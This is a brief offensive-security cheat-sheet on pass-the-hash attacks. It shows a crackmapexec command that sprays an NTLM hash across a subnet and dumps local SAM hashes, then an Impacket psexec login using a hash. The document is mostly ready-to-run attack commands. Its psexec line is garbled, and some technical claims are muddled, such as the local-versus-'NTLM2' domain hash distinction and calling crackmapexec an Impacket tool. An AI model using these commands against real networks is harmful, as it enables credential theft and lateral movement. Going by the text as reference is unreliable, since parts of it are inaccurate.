Pass the hash

This attack only works with local SAM hashes(NTLM) and not Domain hashes(NTLM2). Since many administrators use the same passwords for both local and domain accounts it is possible to login to a domain controller and other high value systems using only local hashes.

Hash Spraying

IMPackets crackmapexec is able to use a single hash and spray the entire subnetwork with it to not only try and gain access but once gaining access to a system, dumping all of those local hashes as-well. Crackmapexec is able to spray for the following protococols: ldap, ssh, smb, winrm and mssql.

crackmapexec smb -u Administrator -H 64f12cddaa88057e06a81b54e73b949b –sam

As you can see the Administrator has local accounts on a number of systems including a Server2019 system.

Logging into accounts using the hash

To login to an account using the hash(provided the credentials are re-used on domain controller) use Impackets psexec tool. Administrator:@ -hashes aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b